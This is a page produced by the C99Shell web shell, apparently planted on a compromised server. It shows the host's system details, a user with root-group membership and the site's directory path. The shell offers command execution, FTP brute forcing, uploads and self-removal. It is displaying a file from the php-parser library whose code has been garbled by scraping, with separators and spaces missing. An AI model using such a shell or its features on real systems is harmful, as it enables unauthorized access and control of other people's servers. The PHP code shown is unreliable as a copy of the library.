!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/nikic/php-parser/lib/PhpParser/Internal/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PrintableNewAnonClassNode.php (2.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);

namespace 
PhpParser\Internal;

use 
PhpParser\Node;
use 
PhpParser\Node\Expr;

/**
 * This node is used internally by the format-preserving pretty printer to print anonymous classes.
 *
 * The normal anonymous class structure violates assumptions about the order of token offsets.
 * Namely, the constructor arguments are part of the Expr\New_ node and follow the class node, even
 * though they are actually interleaved with them. This special node type is used temporarily to
 * restore a sane token offset order.
 *
 * @internal
 */
class PrintableNewAnonClassNode extends Expr
{
    
/** @var Node\AttributeGroup[] PHP attribute groups */
    
public $attrGroups;
    
/** @var int Modifiers */
    
public $flags;
    
/** @var Node\Arg[] Arguments */
    
public $args;
    
/** @var null|Node\Name Name of extended class */
    
public $extends;
    
/** @var Node\Name[] Names of implemented interfaces */
    
public $implements;
    
/** @var Node\Stmt[] Statements */
    
public $stmts;

    public function 
__construct(
        array 
$attrGroupsint $flags, array $argsNode\Name $extends null, array $implements,
        array 
$stmts, array $attributes
    
) {
        
parent::__construct($attributes);
        
$this->attrGroups $attrGroups;
        
$this->flags $flags;
        
$this->args $args;
        
$this->extends $extends;
        
$this->implements $implements;
        
$this->stmts $stmts;
    }

    public static function 
fromNewNode(Expr\New_ $newNode) {
        
$class $newNode->class;
        
assert($class instanceof Node\Stmt\Class_);
        
// We don't assert that $class->name is null here, to allow consumers to assign unique names
        // to anonymous classes for their own purposes. We simplify ignore the name here.
        
return new self(
            
$class->attrGroups$class->flags$newNode->args$class->extends$class->implements,
            
$class->stmts$newNode->getAttributes()
        );
    }

    public function 
getType() : string {
        return 
'Expr_PrintableNewAnonClass';
    }

    public function 
getSubNodeNames() : array {
        return [
'attrGroups''flags''args''extends''implements''stmts'];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0065 ]--